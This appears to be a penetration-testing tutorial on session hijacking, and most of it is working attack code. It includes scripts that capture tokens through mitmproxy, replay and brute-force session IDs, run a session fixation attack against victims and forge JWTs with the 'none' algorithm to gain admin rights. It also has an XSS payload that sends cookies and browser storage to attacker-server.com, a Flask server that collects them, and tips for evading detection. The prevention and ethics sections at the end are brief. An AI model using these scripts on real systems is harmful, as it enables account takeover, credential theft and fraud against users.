Session Hijacking
Understanding Session Hijacking - Authentication Bypass Through Session Control
What is Session Hijacking?
Simple Definition: Session hijacking involves stealing or manipulating session tokens to gain unauthorized access to authenticated user accounts without knowing their credentials, exploiting session management weaknesses to impersonate legitimate users.
Technical Definition: Session hijacking exploits weaknesses in session management implementations to obtain valid session identifiers, authentication cookies, or tokens that can be replayed to bypass authentication mechanisms, enabling complete account takeover through session state manipulation and credential-free access.
Why Session Hijacking Works
Session hijacking succeeds by exploiting fundamental session management characteristics:
- Session State Persistence: Applications rely on session tokens to maintain authentication state
- Token-Based Authentication: Valid session tokens provide immediate access without credential verification
- Insufficient Session Protection: Many applications lack proper session token security measures
- Predictable Session Management: Weak session ID generation or predictable token patterns
Attack Process Breakdown
Normal Session Management
- User Authentication: User provides valid credentials to application
- Session Creation: Application generates unique session identifier
- Token Distribution: Session token provided to client via cookies or headers
- Authenticated Access: Client uses session token for subsequent authenticated requests
- Session Expiration: Token becomes invalid after timeout or logout
Session Hijacking Process
- Session Token Discovery: Identify and capture valid session tokens from network traffic
- Token Analysis: Analyze session token format, validation mechanisms, and security controls
- Session Replay: Use captured tokens to impersonate legitimate authenticated users
- Account Takeover: Gain complete access to victim accounts using hijacked sessions
- Persistent Access: Maintain access through session manipulation and token refresh
Real-World Impact
Complete Account Takeover: Gain full access to victim accounts without credential knowledge
Financial Fraud: Access banking and payment systems using hijacked financial application sessions
Data Exfiltration: Access sensitive personal and corporate data through compromised sessions
Identity Theft: Impersonate victims in online services and social media platforms
Business Disruption: Compromise critical business applications and administrative accounts
Technical Concepts
Session Token Types
HTTP Cookies: Session identifiers stored in browser cookies JWT Tokens: JSON Web Tokens containing session and authentication information API Keys: Application-specific authentication tokens for service access Bearer Tokens: OAuth and similar protocol authentication tokens
Session Management Vulnerabilities
Predictable Session IDs: Weak random number generation for session identifier creation Session Fixation: Forcing specific session identifiers on victims Insufficient Session Expiration: Long-lived sessions without proper timeout controls Cross-Site Session Leakage: Session tokens exposed through various attack vectors
Attack Vector Categories
Network-Based Hijacking: Intercepting session tokens from network communications Cross-Site Scripting (XSS): Stealing session cookies through malicious JavaScript Session Fixation: Forcing known session identifiers on target users Brute Force Enumeration: Guessing or enumerating valid session identifiers
Technical Implementation
Prerequisites
Network Requirements:
- Ability to intercept or observe session traffic
- Understanding of target application session management
- Access to network communications or application interfaces
Essential Tools:
- Burp Suite: Web application security testing with session analysis
- OWASP ZAP: Open-source web application security scanner
- Wireshark: Network protocol analyzer for session token capture
- Cookie Cadger: Session token enumeration and capture
Essential Command Sequence
Step 1: Session Token Discovery and Analysis
# Capture network traffic for session token analysis
tcpdump -i eth0 -A 'port 80 or port 443' | grep -i cookie
# Captures HTTP traffic containing cookie headers
# Identifies session tokens in network communications
# Shows clear-text session information
# Monitor HTTPS traffic for session analysis (requires MitM positioning)
mitmproxy --mode transparent --listen-port 8080 -s session_capture.py
# Captures HTTPS session tokens through proxy
# Enables analysis of encrypted session communications
# Provides comprehensive session token visibilityAdvanced Session Token Extraction:
#!/usr/bin/env python3
from mitmproxy import http
import re
import json
import base64
class SessionTokenExtractor:
def __init__(self):
self.session_tokens = {}
self.jwt_tokens = []
def response(self, flow: http.HTTPFlow) -> None:
"""Extract session tokens from HTTP responses"""
# Extract Set-Cookie headers
if "set-cookie" in flow.response.headers:
cookies = flow.response.headers["set-cookie"]
# Look for session-related cookies
session_patterns = ["sessionid", "auth", "token", "jsessionid", "phpsessid", "asp.net_sessionid"]
for pattern in session_patterns:
if pattern in cookies.lower():
self.session_tokens[flow.request.pretty_host] = cookies
print(f"SESSION TOKEN: {cookies} from {flow.request.pretty_host}")
# Extract JWT tokens from responses
response_text = flow.response.get_text()
jwt_pattern = r'eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+'
jwt_matches = re.findall(jwt_pattern, response_text)
for jwt in jwt_matches:
try:
# Decode JWT header and payload
header = json.loads(base64.urlsafe_b64decode(jwt.split('.')[0] + '=='))
payload = json.loads(base64.urlsafe_b64decode(jwt.split('.')[1] + '=='))
self.jwt_tokens.append({
'token': jwt,
'host': flow.request.pretty_host,
'header': header,
'payload': payload
})
print(f"JWT TOKEN: {jwt[:50]}... from {flow.request.pretty_host}")
print(f"Payload: {payload}")
except:
pass
def request(self, flow: http.HTTPFlow) -> None:
"""Extract session tokens from HTTP requests"""
# Extract Authorization headers
if "authorization" in flow.request.headers:
auth_header = flow.request.headers["authorization"]
print(f"AUTH HEADER: {auth_header} to {flow.request.pretty_host}")
# Extract cookies from requests
if "cookie" in flow.request.headers:
cookies = flow.request.headers["cookie"]
print(f"REQUEST COOKIES: {cookies} to {flow.request.pretty_host}")
# Save as session_capture.py and run with mitmproxyStep 2: Session Token Validation and Testing
# Test session token validity with curl
curl -H "Cookie: sessionid=abc123def456" \
-H "User-Agent: Mozilla/5.0" \
https://target-app.com/dashboard
# Tests captured session token validity
# Verifies successful session hijacking
# Shows authenticated access using stolen tokens
# Test JWT token authentication
curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
https://api.target-app.com/user/profile
# Tests JWT token validity and access
# Verifies API authentication bypass
# Shows scope of hijacked session accessAutomated Session Testing:
#!/usr/bin/env python3
import requests
import json
import time
class SessionHijacker:
def __init__(self, base_url):
self.base_url = base_url
self.session = requests.Session()
self.valid_tokens = []
def test_session_token(self, token, token_type="cookie"):
"""Test validity of captured session token"""
test_endpoints = [
"/dashboard",
"/profile",
"/account",
"/admin",
"/api/user"
]
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}
if token_type == "cookie":
cookies = {"sessionid": token}
elif token_type == "jwt":
headers["Authorization"] = f"Bearer {token}"
elif token_type == "api_key":
headers["X-API-Key"] = token
for endpoint in test_endpoints:
try:
url = f"{self.base_url}{endpoint}"
if token_type == "cookie":
response = self.session.get(url, headers=headers, cookies=cookies, timeout=10)
else:
response = self.session.get(url, headers=headers, timeout=10)
if response.status_code == 200:
if "login" not in response.text.lower() and "unauthorized" not in response.text.lower():
print(f"✓ Valid session token for {endpoint}: {token[:20]}...")
self.valid_tokens.append({
'token': token,
'type': token_type,
'endpoint': endpoint,
'status': response.status_code
})
return True
except requests.RequestException:
continue
print(f"✗ Invalid session token: {token[:20]}...")
return False
def enumerate_session_ids(self, pattern_base, length=32):
"""Enumerate potential session IDs based on patterns"""
import itertools
import string
# Common session ID patterns
charset = string.ascii_lowercase + string.digits
# Try variations of captured session base
for i in range(100): # Limited enumeration
# Modify last few characters
modified_token = pattern_base[:-4] + ''.join(
itertools.islice(itertools.cycle(charset), i, i+4)
)
if self.test_session_token(modified_token):
print(f"Found valid enumerated token: {modified_token}")
return self.valid_tokens
# Example usage
hijacker = SessionHijacker("https://target-app.com")
# Test captured tokens
captured_tokens = [
"abc123def456ghi789",
"xyz987uvw654rst321"
]
for token in captured_tokens:
hijacker.test_session_token(token)Step 3: Session Fixation Attacks
# Identify session management behavior
curl -c cookies.txt -b cookies.txt https://target-app.com/login
# -c: Save cookies to file
# -b: Load cookies from file
# Identifies session handling and cookie behavior
# Monitor session ID changes during authentication
curl -c initial_cookies.txt https://target-app.com/login
curl -c post_auth_cookies.txt -b initial_cookies.txt \
-d "username=victim&password=password123" \
https://target-app.com/login
# Compares session IDs before and after authentication
# Identifies session fixation vulnerabilities
# Shows session management implementation flawsSession Fixation Implementation:
#!/usr/bin/env python3
import requests
import urllib.parse
class SessionFixationAttack:
def __init__(self, target_url):
self.target_url = target_url
self.session = requests.Session()
def create_fixation_url(self, session_id):
"""Create URL with fixed session ID"""
# Common session fixation methods
fixation_methods = [
f"{self.target_url}?sessionid={session_id}",
f"{self.target_url}?PHPSESSID={session_id}",
f"{self.target_url}?jsessionid={session_id}",
f"{self.target_url};jsessionid={session_id}"
]
return fixation_methods
def test_session_fixation(self, fixed_session_id):
"""Test if application accepts fixed session ID"""
fixation_urls = self.create_fixation_url(fixed_session_id)
for url in fixation_urls:
try:
# Request with fixed session ID
response = self.session.get(url)
# Check if session ID was accepted
if 'set-cookie' in response.headers:
cookies = response.headers['set-cookie']
if fixed_session_id in cookies:
print(f"✓ Session fixation successful: {url}")
print(f"Fixed session ID accepted: {fixed_session_id}")
return True
except requests.RequestException:
continue
print(f"✗ Session fixation failed for: {fixed_session_id}")
return False
def execute_fixation_attack(self, victim_email):
"""Execute complete session fixation attack"""
# Generate or use known session ID
fixed_session = "attacker_controlled_session_123"
# Test if fixation is possible
if self.test_session_fixation(fixed_session):
# Create malicious link for victim
fixation_link = f"{self.target_url}?sessionid={fixed_session}"
print(f"Send this link to victim: {fixation_link}")
print("After victim logs in with this link, use session ID:")
print(f"Cookie: sessionid={fixed_session}")
# Monitor for victim authentication
return self.monitor_session_authentication(fixed_session)
def monitor_session_authentication(self, session_id):
"""Monitor fixed session for authentication"""
test_url = f"{self.target_url}/dashboard"
headers = {"User-Agent": "Mozilla/5.0"}
cookies = {"sessionid": session_id}
print("Monitoring session for victim authentication...")
for attempt in range(60): # Monitor for 10 minutes
try:
response = requests.get(test_url, headers=headers, cookies=cookies, timeout=5)
if response.status_code == 200 and "dashboard" in response.text.lower():
print(f"✓ Victim authenticated! Session hijacked: {session_id}")
return True
time.sleep(10) # Check every 10 seconds
except requests.RequestException:
continue
print("Session fixation attack timeout - victim did not authenticate")
return False
# Example usage
attack = SessionFixationAttack("https://vulnerable-app.com")
attack.execute_fixation_attack("victim@company.com")Step 4: Cross-Site Session Extraction
XSS-Based Session Hijacking:
// JavaScript payload for session token extraction
// Inject into vulnerable application via XSS
// Extract all cookies
var cookies = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://attacker-server.com/collect', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('cookies=' + encodeURIComponent(cookies) + '&url=' + encodeURIComponent(window.location.href));
// Extract localStorage tokens
var localData = {};
for (var i = 0; i < localStorage.length; i++) {
var key = localStorage.key(i);
localData[key] = localStorage.getItem(key);
}
// Send localStorage data
xhr.open('POST', 'https://attacker-server.com/collect', true);
xhr.send('localStorage=' + encodeURIComponent(JSON.stringify(localData)));
// Extract sessionStorage tokens
var sessionData = {};
for (var i = 0; i < sessionStorage.length; i++) {
var key = sessionStorage.key(i);
sessionData[key] = sessionStorage.getItem(key);
}
// Send sessionStorage data
xhr.open('POST', 'https://attacker-server.com/collect', true);
xhr.send('sessionStorage=' + encodeURIComponent(JSON.stringify(sessionData)));Server-Side Session Collection:
#!/usr/bin/env python3
from flask import Flask, request
import json
import time
app = Flask(__name__)
@app.route('/collect', methods=['POST'])
def collect_sessions():
"""Collect hijacked session data from XSS payloads"""
timestamp = time.strftime('%Y-%m-%d %H:%M:%S')
client_ip = request.remote_addr
user_agent = request.headers.get('User-Agent', 'Unknown')
# Log session data
session_data = {
'timestamp': timestamp,
'ip': client_ip,
'user_agent': user_agent,
'cookies': request.form.get('cookies'),
'localStorage': request.form.get('localStorage'),
'sessionStorage': request.form.get('sessionStorage'),
'url': request.form.get('url')
}
# Save to file
with open('hijacked_sessions.json', 'a') as f:
f.write(json.dumps(session_data) + '\n')
print(f"Session data collected from {client_ip}:")
print(f"Cookies: {session_data['cookies']}")
return "OK"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=443, ssl_context='adhoc')Step 5: Advanced Session Manipulation
JWT Token Manipulation:
#!/usr/bin/env python3
import jwt
import json
import base64
from datetime import datetime, timedelta
class JWTSessionHijacker:
def __init__(self):
self.captured_tokens = []
def analyze_jwt(self, token):
"""Analyze JWT token structure and claims"""
try:
# Decode without verification to analyze structure
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, options={"verify_signature": False})
print(f"JWT Header: {header}")
print(f"JWT Payload: {payload}")
# Check for weak signing algorithms
if header.get('alg') == 'none':
print("⚠️ JWT uses 'none' algorithm - signature bypass possible")
elif header.get('alg') == 'HS256':
print("⚠️ JWT uses HS256 - potential for key brute force")
# Check for interesting claims
if 'role' in payload:
print(f"Role claim found: {payload['role']}")
if 'admin' in payload:
print(f"Admin claim found: {payload['admin']}")
return {'header': header, 'payload': payload}
except jwt.InvalidTokenError as e:
print(f"Invalid JWT token: {e}")
return None
def forge_jwt_token(self, original_token, modifications):
"""Attempt to forge JWT with modifications"""
try:
# Decode original token
header = jwt.get_unverified_header(original_token)
payload = jwt.decode(original_token, options={"verify_signature": False})
# Apply modifications
for key, value in modifications.items():
payload[key] = value
# Attempt signature bypass with 'none' algorithm
header['alg'] = 'none'
# Create forged token
header_b64 = base64.urlsafe_b64encode(
json.dumps(header, separators=(',', ':')).encode()
).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(
json.dumps(payload, separators=(',', ':')).encode()
).decode().rstrip('=')
# No signature for 'none' algorithm
forged_token = f"{header_b64}.{payload_b64}."
print(f"Forged JWT token: {forged_token}")
return forged_token
except Exception as e:
print(f"JWT forging failed: {e}")
return None
def extend_jwt_expiration(self, token, hours=24):
"""Attempt to extend JWT token expiration"""
modifications = {
'exp': int((datetime.now() + timedelta(hours=hours)).timestamp())
}
return self.forge_jwt_token(token, modifications)
def elevate_jwt_privileges(self, token):
"""Attempt to elevate privileges in JWT token"""
modifications = {
'role': 'admin',
'admin': True,
'permissions': ['read', 'write', 'admin'],
'level': 'administrator'
}
return self.forge_jwt_token(token, modifications)
# Example usage
hijacker = JWTSessionHijacker()
# Analyze captured JWT
captured_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
analysis = hijacker.analyze_jwt(captured_jwt)
if analysis:
# Attempt privilege escalation
admin_token = hijacker.elevate_jwt_privileges(captured_jwt)
extended_token = hijacker.extend_jwt_expiration(captured_jwt, hours=168) # 1 weekAttack Variations
Session Token Brute Force
#!/usr/bin/env python3
import requests
import threading
import itertools
import string
import time
class SessionBruteForcer:
def __init__(self, target_url, session_length=32):
self.target_url = target_url
self.session_length = session_length
self.valid_sessions = []
self.threads = []
def generate_session_candidates(self, observed_session):
"""Generate potential session IDs based on observed patterns"""
# Extract patterns from observed session
if observed_session:
# Try sequential variations
if observed_session[-4:].isdigit():
base = observed_session[:-4]
for i in range(1000):
yield base + str(i).zfill(4)
# Try character substitutions
chars = string.ascii_lowercase + string.digits
for i in range(len(observed_session)):
for char in chars:
candidate = list(observed_session)
candidate[i] = char
yield ''.join(candidate)
def test_session_validity(self, session_id):
"""Test if session ID provides authenticated access"""
headers = {"User-Agent": "Mozilla/5.0"}
cookies = {"sessionid": session_id}
try:
response = requests.get(
f"{self.target_url}/dashboard",
headers=headers,
cookies=cookies,
timeout=5
)
# Check for successful authentication indicators
if (response.status_code == 200 and
"welcome" in response.text.lower() and
"login" not in response.text.lower()):
self.valid_sessions.append(session_id)
print(f"✓ Valid session found: {session_id}")
return True
except requests.RequestException:
pass
return False
def brute_force_sessions(self, base_session, max_attempts=1000):
"""Brute force session IDs with threading"""
def worker():
for session_candidate in itertools.islice(
self.generate_session_candidates(base_session),
max_attempts
):
self.test_session_validity(session_candidate)
time.sleep(0.1) # Rate limiting
# Start multiple worker threads
for _ in range(10):
thread = threading.Thread(target=worker)
thread.start()
self.threads.append(thread)
# Wait for completion
for thread in self.threads:
thread.join()
return self.valid_sessions
# Example usage
brute_forcer = SessionBruteForcer("https://target-app.com")
valid_sessions = brute_forcer.brute_force_sessions("abc123def456ghi7", max_attempts=100)Cross-Domain Session Exploitation
# Test for cross-domain session vulnerabilities
curl -H "Origin: https://malicious-site.com" \
-H "Cookie: sessionid=captured_session_token" \
https://target-app.com/api/sensitive-data
# Tests CORS configuration with hijacked sessions
# Identifies cross-domain session usage vulnerabilities
# Shows potential for cross-site session exploitation
# Test session token in different contexts
curl -H "Referer: https://attacker-site.com" \
-H "Cookie: sessionid=captured_session_token" \
https://target-app.com/admin/users
# Tests session validation against referrer
# Identifies weak session security controls
# Shows scope of hijacked session accessMobile Application Session Hijacking
#!/usr/bin/env python3
import requests
import json
import re
class MobileSessionHijacker:
def __init__(self, base_url):
self.base_url = base_url
self.mobile_headers = {
"User-Agent": "MyApp/1.0 (iOS 14.0; iPhone12,1)",
"Accept": "application/json",
"Content-Type": "application/json"
}
def extract_mobile_tokens(self, network_capture):
"""Extract mobile app tokens from network capture"""
# Common mobile token patterns
token_patterns = [
r'"access_token":"([^"]+)"',
r'"bearer":"([^"]+)"',
r'"session":"([^"]+)"',
r'"token":"([^"]+)"',
r'Authorization:\s*Bearer\s+([^\s]+)'
]
extracted_tokens = []
for pattern in token_patterns:
matches = re.findall(pattern, network_capture, re.IGNORECASE)
extracted_tokens.extend(matches)
return list(set(extracted_tokens)) # Remove duplicates
def test_mobile_api_access(self, token):
"""Test mobile API access with hijacked token"""
# Common mobile API endpoints
mobile_endpoints = [
"/api/v1/user/profile",
"/api/v1/account/balance",
"/api/v1/messages",
"/api/v1/settings",
"/api/v1/admin/dashboard"
]
headers = self.mobile_headers.copy()
headers["Authorization"] = f"Bearer {token}"
successful_access = []
for endpoint in mobile_endpoints:
try:
response = requests.get(
f"{self.base_url}{endpoint}",
headers=headers,
timeout=10
)
if response.status_code == 200:
successful_access.append({
'endpoint': endpoint,
'data': response.json() if response.headers.get('content-type', '').startswith('application/json') else response.text[:200]
})
print(f"✓ Mobile API access: {endpoint}")
except requests.RequestException:
continue
return successful_access
# Example usage for mobile session hijacking
mobile_hijacker = MobileSessionHijacker("https://api.mobile-app.com")
# Simulate network capture data
network_data = '''
POST /api/v1/login HTTP/1.1
{"username":"victim","password":"secret123"}
HTTP/1.1 200 OK
{"access_token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...","user_id":12345}
'''
tokens = mobile_hijacker.extract_mobile_tokens(network_data)
for token in tokens:
mobile_hijacker.test_mobile_api_access(token)Common Issues and Solutions
Problem: Session tokens appear to be encrypted or encoded
- Solution: Analyze encoding patterns, attempt base64 decoding, identify encryption methods, target weaker session implementations
Problem: Session tokens have short expiration times
- Solution: Implement rapid session replay, attempt session refresh, target session extension mechanisms, use session fixation
Problem: Application implements additional session security measures
- Solution: Analyze IP binding, fingerprinting checks, attempt session migration techniques, target mobile applications
Problem: Session hijacking detected by application security controls
- Solution: Use legitimate user agents, implement timing delays, distribute attempts across multiple IP addresses, target specific application components
Advanced Techniques
Real-time Session Monitoring
#!/usr/bin/env python3
import requests
import threading
import time
import json
class RealTimeSessionMonitor:
def __init__(self, target_app):
self.target_app = target_app
self.active_sessions = {}
self.monitoring = True
def monitor_session_activity(self, session_token):
"""Monitor hijacked session for activity"""
monitor_endpoints = [
"/api/user/activity",
"/dashboard/recent",
"/account/transactions",
"/messages/inbox"
]
headers = {"User-Agent": "Mozilla/5.0"}
cookies = {"sessionid": session_token}
while self.monitoring:
for endpoint in monitor_endpoints:
try:
response = requests.get(
f"{self.target_app}{endpoint}",
headers=headers,
cookies=cookies,
timeout=5
)
if response.status_code == 200:
# Log session activity
activity_data = {
'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
'session': session_token[:10] + '...',
'endpoint': endpoint,
'data_size': len(response.content)
}
print(f"Session activity: {json.dumps(activity_data)}")
except requests.RequestException:
continue
time.sleep(30) # Check every 30 seconds
def start_monitoring(self, session_tokens):
"""Start monitoring multiple hijacked sessions"""
threads = []
for token in session_tokens:
thread = threading.Thread(
target=self.monitor_session_activity,
args=(token,)
)
thread.daemon = True
thread.start()
threads.append(thread)
return threads
# Example usage
monitor = RealTimeSessionMonitor("https://target-app.com")
hijacked_sessions = ["abc123def456", "xyz789uvw012"]
monitor.start_monitoring(hijacked_sessions)Session Token Database
#!/usr/bin/env python3
import sqlite3
import json
import hashlib
from datetime import datetime
class SessionTokenDatabase:
def __init__(self, db_file="session_tokens.db"):
self.conn = sqlite3.connect(db_file, check_same_thread=False)
self.create_tables()
def create_tables(self):
"""Create database tables for session management"""
self.conn.execute('''
CREATE TABLE IF NOT EXISTS sessions (
id INTEGER PRIMARY KEY AUTOINCREMENT,
token_hash TEXT UNIQUE,
token TEXT,
source_ip TEXT,
target_app TEXT,
capture_method TEXT,
timestamp TEXT,
last_tested TEXT,
status TEXT,
user_info TEXT
)
''')
self.conn.execute('''
CREATE TABLE IF NOT EXISTS session_tests (
id INTEGER PRIMARY KEY AUTOINCREMENT,
session_id INTEGER,
test_endpoint TEXT,
test_result TEXT,
response_code INTEGER,
timestamp TEXT,
FOREIGN KEY (session_id) REFERENCES sessions (id)
)
''')
self.conn.commit()
def add_session_token(self, token, source_ip, target_app, capture_method, user_info=None):
"""Add captured session token to database"""
token_hash = hashlib.sha256(token.encode()).hexdigest()
timestamp = datetime.now().isoformat()
try:
self.conn.execute('''
INSERT INTO sessions
(token_hash, token, source_ip, target_app, capture_method, timestamp, status, user_info)
VALUES (?, ?, ?, ?, ?, ?, ?, ?)
''', (token_hash, token, source_ip, target_app, capture_method, timestamp, 'captured',
json.dumps(user_info) if user_info else None))
self.conn.commit()
print(f"Session token added: {token[:20]}...")
except sqlite3.IntegrityError:
print(f"Session token already exists: {token[:20]}...")
def get_valid_sessions(self, target_app=None):
"""Retrieve valid session tokens for testing"""
query = "SELECT * FROM sessions WHERE status IN ('captured', 'valid')"
params = []
if target_app:
query += " AND target_app = ?"
params.append(target_app)
cursor = self.conn.execute(query, params)
return cursor.fetchall()
def update_session_status(self, token_hash, status, test_result=None):
"""Update session token status after testing"""
timestamp = datetime.now().isoformat()
self.conn.execute('''
UPDATE sessions
SET status = ?, last_tested = ?
WHERE token_hash = ?
''', (status, timestamp, token_hash))
self.conn.commit()
# Example usage
db = SessionTokenDatabase()
# Add captured sessions
db.add_session_token(
"abc123def456ghi789",
"192.168.1.100",
"https://banking-app.com",
"network_capture",
{"username": "victim", "role": "user"}
)
# Retrieve valid sessions for testing
valid_sessions = db.get_valid_sessions("https://banking-app.com")
print(f"Found {len(valid_sessions)} valid sessions")Detection and Prevention
Detection Indicators
- Unusual session activity from unexpected IP addresses or locations
- Session tokens being used from multiple concurrent sessions
- High-value account access outside normal usage patterns
- Session tokens with extended or modified expiration times
- Anomalous API usage patterns or unexpected endpoint access
Prevention Measures
Session Security Implementation:
# Secure session management practices
import secrets
import hashlib
from datetime import datetime, timedelta
class SecureSessionManager:
def generate_secure_session_id(self):
"""Generate cryptographically secure session ID"""
return secrets.token_urlsafe(32)
def bind_session_to_client(self, session_id, client_ip, user_agent):
"""Bind session to client characteristics"""
client_fingerprint = hashlib.sha256(
f"{client_ip}{user_agent}".encode()
).hexdigest()
return {"session_id": session_id, "fingerprint": client_fingerprint}
def validate_session_context(self, session_data, current_ip, current_ua):
"""Validate session against client context"""
current_fingerprint = hashlib.sha256(
f"{current_ip}{current_ua}".encode()
).hexdigest()
return session_data["fingerprint"] == current_fingerprintApplication Security Controls:
- Implement secure session ID generation using cryptographically secure random numbers
- Bind sessions to client IP addresses and browser fingerprints
- Use short session timeouts with automatic renewal
- Implement session token rotation on privilege changes
- Deploy comprehensive session activity monitoring
Network Security Measures:
- Use HTTPS exclusively for session token transmission
- Implement HTTP Strict Transport Security (HSTS)
- Deploy proper certificate validation and pinning
- Monitor network traffic for session token exposure
Professional Context
Legitimate Use Cases
- Security Assessment: Testing session management implementation and security controls
- Penetration Testing: Demonstrating session-based attack vectors and account takeover risks
- Application Security Testing: Evaluating session security in web and mobile applications
- Security Training: Educational demonstration of session management vulnerabilities
Legal and Ethical Requirements
Authorization: Session hijacking can provide complete account access - explicit written permission essential
Scope Definition: Clearly identify which applications and user accounts are in-scope for testing
Data Protection: Implement secure handling of captured session tokens and accessed account information
User Privacy: Ensure compliance with privacy regulations when accessing personal account information
Session hijacking attacks demonstrate critical vulnerabilities in session management implementations and highlight the importance of comprehensive session security controls, providing essential skills for application security assessment while emphasizing the need for secure authentication and session management practices.